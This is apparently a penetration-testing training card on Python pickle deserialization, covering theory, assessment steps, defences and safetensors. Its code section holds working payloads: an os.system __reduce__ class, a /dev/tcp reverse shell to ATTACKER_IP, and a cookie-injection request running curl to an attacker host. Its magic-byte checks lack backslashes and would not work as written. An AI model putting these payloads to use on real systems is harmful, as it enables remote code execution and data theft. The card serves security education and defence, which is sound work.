Pickle deserialization
Theory
Why This Matters
Python's pickle module is the de-facto serialization mechanism in the data science and machine learning ecosystem, and its exploitation surface has expanded dramatically as ML model files (.pkl, .pt, .joblib) are shared via public model hubs. CVE-2014-1912 demonstrated pickle deserialization in a widely used Python library. More recently, researchers from Trail of Bits and HiddenLayer documented that PyTorch .pt files and scikit-learn .pkl files loaded from untrusted sources (Hugging Face Hub, S3 buckets, email attachments) execute arbitrary Python code during torch.load() or joblib.load() — no exploit sophistication required. Any web application that accepts serialized Python objects — in cookies, API parameters, file uploads, or ML model endpoints — is potentially vulnerable.
Core Concept
The pickle protocol is a stack-based virtual machine that reconstructs Python object graphs from a byte stream. During reconstruction, pickle calls __reduce__() on objects that define it. The return value of __reduce__() is a tuple (callable, args) that pickle invokes as callable(*args). Because there is no restriction on which callable or args are used, an attacker who controls the pickle stream can specify os.system as the callable and any shell command string as the argument.
The __reduce__ method is the standard exploitation primitive. A malicious pickle is constructed by serializing an object whose __reduce__ returns (os.system, ("id",)). When pickle.loads() processes this byte stream, it calls os.system("id") — arbitrary code execution with the privileges of the Python process.
Magic bytes for pickle streams:
- Protocol 0 (ASCII): begins with the opcode character ( or c.
- Protocol 2: begins with x80x02.
- Protocol 4: begins with x80x04.
- Protocol 5: begins with x80x05.
Cloudpickle and dill extend pickle and are equally vulnerable — they serialize closures and lambdas, giving attackers even more expressive payloads.
Safe alternatives: json, msgpack, protobuf, and orjson do not support arbitrary object instantiation. For ML models, safetensors is the format specifically designed to eliminate the pickle attack surface. Never call pickle.loads(), joblib.load(), or torch.load() on data from an untrusted source without cryptographic provenance verification (signing + signature check before loading).
Technical Deep-Dive
# ── Crafting a malicious pickle payload ───────────────────────────────────
import pickle, os, base64
class RCEPayload:
"""Malicious class — __reduce__ executes a shell command on deserialization."""
def __init__(self, command):
self.command = command
def __reduce__(self):
# pickle calls: os.system(self.command) during loads()
return (os.system, (self.command,))
# Payload 1: simple command execution
payload = pickle.dumps(RCEPayload("id > /tmp/rce_proof.txt"))
print("[+] Raw payload bytes (hex):", payload.hex())
print("[+] Base64:", base64.b64encode(payload).decode())
# b64 will begin with gASV... (protocol 4) or gAJ... (protocol 2)
# Payload 2: reverse shell via subprocess
import subprocess
class RevShell:
def __reduce__(self):
cmd = "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"
return (subprocess.check_output, (["/bin/bash", "-c", cmd],))
revshell_payload = pickle.dumps(RevShell())
print("[+] Reverse shell payload (b64):", base64.b64encode(revshell_payload).decode())
# ── Detection: identify pickle magic bytes in a cookie or parameter ────────
import sys
def is_pickle(data: bytes) -> bool:
return data[:2] in (b'x80x02', b'x80x03', b'x80x04', b'x80x05')
# Test against a cookie value
cookie_value = "gASVIAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAJpZJSFlFKULg=="
raw = base64.b64decode(cookie_value)
print("Is pickle?", is_pickle(raw)) # True
# ── Exploitation via cookie injection ─────────────────────────────────────
import requests
payload_b64 = base64.b64encode(pickle.dumps(RCEPayload("curl http://ATTACKER/$(id)"))).decode()
resp = requests.get(
"https://app.example.com/dashboard",
cookies={"session": payload_b64},
)
print(resp.status_code, resp.text[:200])
# ── Safe alternatives ──────────────────────────────────────────────────────
import json
# JSON: safe, no object instantiation
safe_data = json.loads(json.dumps({"user": "alice", "role": "admin"}))
# For ML models: use safetensors instead of torch.load()
# pip install safetensors
# from safetensors import safe_open
# Check for pickle magic bytes in captured HTTP traffic
# In Burp: Decoder tab → base64 decode a cookie → view as hex
# Magic bytes to look for: 80 02, 80 03, 80 04, 80 05
# Automated scan: look for b64-encoded pickles in all parameters
grep -oP "[A-Za-z0-9+/]{40,}={0,2}" requests.txt | while read b64; do
decoded=$(echo "$b64" | base64 -d 2>/dev/null | xxd | head -1)
echo "$decoded" | grep -q "8002|8003|8004|8005" && echo "[PICKLE] $b64"
done
Security Assessment Methodology
- Identify Python application indicators — Check
X-Powered-By, error tracebacks (Python stack traces expose framework and Python version), file extensions (.py,.wsgi), and dependency files (requirements.txt,Pipfile). - Search for serialized data in all cookie values and parameters — Base64-decode every cookie and opaque parameter. Check for pickle magic bytes (
x80x02throughx80x05). Also search for.pkl,.pickle,.pt,.joblibin file upload endpoints. - Craft a safe detection payload (OOB DNS) — Build a pickle that executes
nslookup YOUR.burpcollab.netorcurl http://YOUR.interactsh.com. Submit and monitor for DNS callback. This confirms deserialization without writing files. - Escalate to command execution — Replace the DNS payload with
id > /tmp/pickle_rce_proof. Confirm file creation via a subsequent read (if the app has a file-reading endpoint) or via a web-accessible path. - Test ML model upload endpoints — If the application accepts model file uploads, submit a
.pklor.ptfile containing a malicious pickle. Observe for OOB callback on model loading. - Test all serialization libraries — If
cloudpickleordillis inrequirements.txt, test with those libraries' serialization format as well (they share the pickle protocol).
Defensive Countermeasure — Never call
pickle.loads()on data from any untrusted source. Replace pickle-based session cookies with cryptographically signed JSON (e.g., Flask'sitsdangerouswithTimestampSigner). For ML model distribution, enforcesafetensorsformat and verify a cryptographic signature (SHA-256 hash + signature from a trusted registry) before loading any model file. Addimport pickleto a static analysis forbidden-import list in CI.
Common Assessment Errors
- Assuming only cookies are affected — Pickles appear in POST body parameters, URL query strings, file uploads, and even Redis/Memcached cache values that the application later deserializes. Check all data paths.
- Forgetting that dill and cloudpickle are equally vulnerable — If
pickleis replaced withdillorcloudpickle, the vulnerability is identical. Search for all three inrequirements.txt. - Using a blocking payload in a blind context —
os.system()blocks until the command completes. A reverse shell payload will hang the request. Use OOB (curl/DNS) for blind contexts to avoid detection and denial-of-service. - Missing ML model endpoints —
torch.load(),joblib.load(), andnumpy.load()withallow_pickle=Trueall callpickle.loads()internally. Model upload and load endpoints are often forgotten in assessments. - Not checking the protocol version — Protocol 0 pickles (ASCII-based, no magic bytes) can be injected in contexts where binary bytes are not allowed. Check for lines starting with
(orcin text-based parameters. - Assuming safe_load equivalents exist for pickle — Unlike PyYAML (which has
safe_load), Python's pickle has no safe loading mode. The entire protocol is unsafe for untrusted input.
NICE Framework Alignment
| Code | Knowledge/Skill/Task Statement | How This Card Develops It |
|---|---|---|
| K0009 | Knowledge of application vulnerabilities | Explains the __reduce__ mechanism that makes pickle deserialization inherently unsafe |
| K0070 | Knowledge of system and application security threats and vulnerabilities | Connects pickle RCE to the ML model supply chain threat landscape |
| S0001 | Skill in conducting vulnerability scans and recognizing vulnerabilities in security systems | Trains magic byte detection and OOB-first confirmation methodology |
| S0044 | Skill in mimicking threat behaviors to test defenses | Develops pickle payload crafting skill using Python's own serialization API |
| T0028 | Conduct and support authorized penetration testing on enterprise networks | Provides a complete methodology from detection through RCE confirmation |
| T0591 | Perform penetration testing as required for new or updated applications | Frames pickle testing as required for Python applications and ML endpoints |
Further Reading
- "Exploiting Misuse of Python's Pickle" — checkoway.net (offline reference)
- HiddenLayer: ML Model Backdoors via Pickle — HiddenLayer Research (2023)
- safetensors: Safe ML Model Serialization — Hugging Face Documentation
Challenge Lab
Reinforce your learning with a hands-on generated challenge based on this card's competency.